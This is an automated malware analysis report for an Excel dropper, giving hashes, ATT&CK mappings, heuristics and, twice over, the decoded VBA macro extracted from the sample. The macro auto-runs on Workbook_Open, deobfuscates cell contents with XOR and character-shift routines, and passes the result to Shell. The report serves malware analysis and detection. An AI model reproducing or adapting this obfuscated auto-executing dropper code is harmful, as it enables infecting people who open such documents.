Xls.Dropper.Agent-7005625-0 Office (OLE) malware analysis — malicious · cb0b8a2c1ca33d89

MALICIOUS

Office (OLE)

87.5 KB Created: 2019-05-10 10:42:31 Authoring application: Microsoft Excel First seen: 2019-05-31

MD5: e248de626ccf3853a5435a7014c2cdb5 SHA-1: 156c29dcf64cb944794b3ac88c4e04eb99b8b048 SHA-256: cb0b8a2c1ca33d89a2181e58a0948bd88f478a39af45d0b54c53913cd89a5aba

180 Risk Score

Malware Insights

Xls.Dropper.Agent-7005625-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' and the presence of a 'Workbook_Open' macro indicate that the sample is designed to execute arbitrary code upon opening. The VBA script contains obfuscated code that, when deobfuscated, calls the Shell() function to download and execute a payload. The ClamAV detection name 'Xls.Dropper.Agent-7005625-0' further supports its nature as a dropper.

Heuristics 4

ClamAV: Xls.Dropper.Agent-7005625-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7005625-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2293 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2293 bytes
SHA-256: `36c5c1e771afaaeadead3227d12b9132f750b5a486612d74f1efb024daa89d6a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "このワークブック" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function Act(ByVal mathh As String, ByVal Paraf As String) As String Dim a, b, c, d As String Dim kios As Long Dim doggy As Long Dim cn As Long c = mathh b = Paraf a = "" kios = Len(c) doggy = Len(b) For cn = 1 To kios Step 3 a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1))) Next cn Act = a End Function Private Sub Workbook_Open() 'MsgBox If xlXmlExportValidationFailed > 0 Then mileand End Sub Function tebinner() tebinner = CC(3, 2 - 1) End Function Function fgda432tuy56dfg4365tdrgfzg() fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(polle) - 1) fgda432tuy56dfg4365tdrgfzg = fdsgfadsrff436tgdfzf33546s End Function Function polle() polle = ((xlDate)) End Function Function enc0000(aAA As String) Dim ligiums, efrat As String Dim wq, Dego, vert As Integer Dego = 2 ligiums = aAA For wq = 1 To Len(ligiums) vert = Asc(Mid(ligiums, wq, 1)) - Dego efrat = efrat & Chr(vert) Next wq enc0000 = efrat End Function Private Sub mileand() If xlMillimeters > 0 Then Ags = 3.24453785683477E+16 If xlListConflictDiscardAllConflicts > 0 Then XlForecastChartTypes = (Shell#(enc0000(Left(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 261)) & Replace(CC(0 + 1, 1 - 0), "-", "+") & enc0000(Right(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 216)), 500 - 2 - 198 - 300)) End If End Sub Function CC() CC = Cells End Function Function malibu() malibu = enc0000(Leftfgda432tuy56dfg4365tdrgfzg * 3) End Function Attribute VB_Name = "シート1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 36c5c1e771afaaeadead3227d12b9132f750b5a486612d74f1efb024daa89d6a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "このワークブック"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True












































































Public Function Act(ByVal mathh As String, ByVal Paraf As String) As String
Dim a, b, c, d As String
Dim kios As Long
Dim doggy As Long
Dim cn As Long
c = mathh
b = Paraf
a = ""
kios = Len(c)
doggy = Len(b)
For cn = 1 To kios Step 3
a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1)))
Next cn
Act = a
End Function
Private Sub Workbook_Open()
'MsgBox
If xlXmlExportValidationFailed > 0 Then mileand
End Sub
Function tebinner()
tebinner = CC(3, 2 - 1)
End Function

Function fgda432tuy56dfg4365tdrgfzg()
fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(polle) - 1)
fgda432tuy56dfg4365tdrgfzg = fdsgfadsrff436tgdfzf33546s
End Function

Function polle()
polle = ((xlDate))
End Function


Function enc0000(aAA As String)
Dim ligiums, efrat As String
Dim wq, Dego, vert As Integer
Dego = 2
ligiums = aAA
For wq = 1 To Len(ligiums)
vert = Asc(Mid(ligiums, wq, 1)) - Dego
efrat = efrat & Chr(vert)
Next wq
enc0000 = efrat
End Function

Private Sub mileand()
If xlMillimeters > 0 Then
Ags = 3.24453785683477E+16
If xlListConflictDiscardAllConflicts > 0 Then XlForecastChartTypes = (Shell#(enc0000(Left(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 261)) & Replace(CC(0 + 1, 1 - 0), "-", "+") & enc0000(Right(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 216)), 500 - 2 - 198 - 300))
End If
End Sub

Function CC()
CC = Cells
End Function

Function malibu()
malibu = enc0000(Leftfgda432tuy56dfg4365tdrgfzg * 3)
End Function




Attribute VB_Name = "シート1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.